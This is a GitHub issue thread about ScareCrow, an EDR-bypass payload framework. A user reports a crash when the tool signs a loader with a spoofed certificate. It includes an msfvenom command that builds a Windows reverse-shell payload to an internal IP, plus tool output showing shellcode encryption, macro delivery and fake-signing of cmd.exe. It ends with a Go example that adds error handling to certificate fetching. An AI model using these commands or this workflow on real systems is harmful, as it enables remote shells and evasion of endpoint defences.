optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.

Code signing certificate generation fails #1

Closed axano closed 3 years ago

axano commented 3 years ago

Whenever I try to generate a binary it fails. I peeked at the code and saw that it fails at the point where the certificate is generated. I have tried it on an up-to-date Kali Linux and on a Debian 9 server.

The payload is generated with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.197 LPORT=51251 -f raw > bin.raw

Tried multiple argument permutations.

Error:

└─$ /opt/ScareCrow/ScareCrow -I /home/kali/Desktop/bin.raw -domain axano.com  -Loader binary -delivery macro -url http://192.168.0.197/

  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6df56a]

goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffe784ad450, 0x9)
        /opt/ScareCrow/limelighter/limelighter.go:56 +0x2ca
ScareCrow/limelighter.Signer(0x7ffe784ad450, 0x9, 0x0, 0x0, 0x0, 0x0, 0xc000448720, 0x7)
        /opt/ScareCrow/limelighter/limelighter.go:1040 +0x4c6
main.execute(0xc0000fa000, 0x76f099, 0x3)
        /opt/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
        /opt/ScareCrow/ScareCrow.go:162 +0x906

Tylous commented 3 years ago

So it pulls the values from a legitimate SSL cert related to the domain. It looks like the domain you're using doesn't have one externally facing... if it's internal it may not be routing properly to get it. I'd try another domain and see if that resolves it.

axano commented 3 years ago

Right. It works with a domain that's publicly available. Thanks! If it's possible, please add error handling.
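The crash above comes from the certificate-lookup step: when the domain has no reachable TLS endpoint, the code goes on to read a certificate that was never obtained and dereferences nil. As an added example, not ScareCrow's own code, this is how that lookup can be written in Go so that DNS failure, a refused connection, an unverifiable chain and an empty chain all come back as errors the caller can report; the port 443 and the default domain example.com are assumptions.

```go
package main

import (
	"crypto/tls"
	"crypto/x509"
	"errors"
	"fmt"
	"net"
	"os"
	"time"
)

// ErrNoPeerCert covers a handshake that yields no certificate chain, the
// case that becomes a nil dereference when code blindly reads PeerCertificates[0].
var ErrNoPeerCert = errors.New("server presented no certificate")

// LeafCert returns the first (leaf) certificate of a chain, or an error
// instead of letting the caller index an empty slice.
func LeafCert(chain []*x509.Certificate) (*x509.Certificate, error) {
	if len(chain) == 0 || chain[0] == nil {
		return nil, ErrNoPeerCert
	}
	return chain[0], nil
}

// FetchLeafCert connects to domain:443 with a bounded timeout and returns the
// validated leaf certificate. DNS failure, connection refused, a chain that does
// not verify against the system roots and an empty chain all surface as errors.
func FetchLeafCert(domain string, timeout time.Duration) (*x509.Certificate, error) {
	dialer := &net.Dialer{Timeout: timeout}
	conn, err := tls.DialWithDialer(dialer, "tcp", net.JoinHostPort(domain, "443"),
		&tls.Config{ServerName: domain, MinVersion: tls.VersionTLS12})
	if err != nil {
		return nil, fmt.Errorf("tls handshake with %s failed: %w", domain, err)
	}
	defer conn.Close()
	return LeafCert(conn.ConnectionState().PeerCertificates)
}

func main() {
	cert, err := FetchLeafCert("example.com", 5*time.Second) // example.com is a placeholder
	if err != nil {
		fmt.Fprintln(os.Stderr, "error:", err) // reported to the user, not a panic
		os.Exit(1)
	}
	fmt.Printf("subject=%q issuer=%q notAfter=%s\n", cert.Subject.CommonName,
		cert.Issuer.CommonName, cert.NotAfter.Format(time.RFC3339))
}
```

Running it against an internal-only or non-existent domain prints a handshake or DNS error and exits with status 1 instead of a SIGSEGV trace.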